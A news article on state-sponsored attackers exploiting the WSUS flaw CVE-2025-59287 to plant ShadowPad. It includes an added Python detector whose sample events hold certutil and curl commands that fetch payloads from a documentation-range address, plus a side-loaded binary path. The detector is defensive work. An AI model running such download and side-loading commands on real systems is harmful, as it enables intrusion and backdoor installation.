Windows Server vulnerability targeted by hackers to spread malware: here’s what we know

  • Chinese state-sponsored actors exploit CVE-2025-59287, a critical flaw in WSUS that allows unauthenticated RCE with SYSTEM privileges.
  • AhnLab reports that attackers are using PowerCat and certutil/curl to spread ShadowPad, a backdoor sequel to PlugX.
  • Potential targets include the government, defense, telecommunications and critical infrastructure sectors.

Experts warn that Chinese state-sponsored threat actors are actively exploiting a vulnerability in Microsoft Windows Server Update Services (WSUS) to spread malware.

As part of the October 2025 Patch Tuesday cumulative update, Microsoft fixed CVE-2025-59287, an “untrusted data deserialization” flaw found in Windows Server Update Services (WSUS). The bug was given a severity rating of 9.8/10 (Critical) because it allows Remote Code Execution (RCE). It can be exploited in low-complexity attacks without user interaction, allowing unauthenticated and unprivileged threat actors to execute malicious code with SYSTEM privileges. In theory, this would let them pivot to and infect other WSUS servers.

Shortly thereafter, publicly available proof-of-concept (PoC) code was discovered, prompting Microsoft to also release an out-of-band (OOB) security update.

Used to deploy ShadowPad

Today, security researchers at the AhnLab Security Intelligence Center (ASEC) said they have observed attacks on unpatched endpoints, suggesting they are the work of Chinese state-sponsored actors.

“The attacker targeted Windows servers with WSUS enabled and exploited CVE-2025-59287 for initial access,” the report states. “They then used PowerCat, an open source PowerShell-based Netcat tool, to obtain a system shell (CMD). They then downloaded and installed ShadowPad using certutil and curl.”

ShadowPad is said to be the successor to PlugX, a modular backdoor “widely used” by Chinese state-sponsored hacking collectives. It is deployed on target endpoints by loading its DLLs through a legitimate binary called ETDCtrlHelper.exe.
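As an added illustration (not code from the article or from AhnLab), the following Python detector flags the post-exploitation chain described above in process-creation telemetry such as Sysmon Event ID 1 or Windows event 4688. It assumes WSUS request handling runs inside IIS's w3wp.exe or WsusService.exe, and the sample events are constructed rather than real logs.

```python
"""Flag the CVE-2025-59287 post-exploitation chain in process-creation events.
Assumption (not from the article): WSUS handles requests in w3wp.exe
(WsusPool) or WsusService.exe, so a shell spawned by either is abnormal."""
import re

WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}          # WSUS host processes
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}       # PowerCat lands here
# Download idioms of the two LOLBins the report names (real tool options).
DOWNLOADERS = {
    "certutil.exe": re.compile(r"(?=.*-urlcache\b)(?=.*\bhttps?://)", re.I),
    "curl.exe": re.compile(r"(?=.*\s-[oO]\b)(?=.*\bhttps?://)", re.I),
}
SIDELOAD_HOST = "etdctrlhelper.exe"   # legit copies live under Program Files

def classify(event):
    """Return the rule names an event matches; an empty list means benign."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    cmd = event.get("cmdline", "")
    hits = []
    if parent in WSUS_PARENTS and image in SHELLS:
        hits.append("wsus_spawned_shell")           # exploit -> shell
    if image in DOWNLOADERS and DOWNLOADERS[image].search(cmd):
        hits.append("lolbin_download")              # certutil/curl fetch
    if image == SIDELOAD_HOST and not event["image"].lower().startswith("c:\\program files"):
        hits.append("sideload_host_unusual_path")   # ETDCtrlHelper outside vendor dir
    return hits

def scan(events):
    """Map event id -> matched rules for every event that matched something."""
    return {e["id"]: classify(e) for e in events if classify(e)}

# Constructed sample telemetry; 198.51.100.7 is a documentation-range address.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"id": 2, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/a.bin C:\\Users\\Public\\a.bin"},
    {"id": 3, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\ETDCtrlHelper.exe http://198.51.100.7/e.exe"},
    {"id": 4, "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Users\\Public\\ETDCtrlHelper.exe", "cmdline": "ETDCtrlHelper.exe"},
    {"id": 5, "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Each rule alone is noisy on some hosts; the chain (WSUS host spawning a shell, then a LOLBin download, then the side-loading host running from a user-writable path) is what separates this campaign from routine administration.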

We don’t know how many organizations were attacked through WSUS, where they are located, or what industries they operate in. But Chinese state-sponsored operations typically target governments, military and defense, telecommunications, or critical infrastructure.

“After the vulnerability’s proof-of-concept (PoC) exploit code was publicly released, attackers quickly used it to spread the ShadowPad malware to WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level privileges, significantly increasing the potential impact.”

WSUS allows IT administrators to manage the patching of computers on their network.
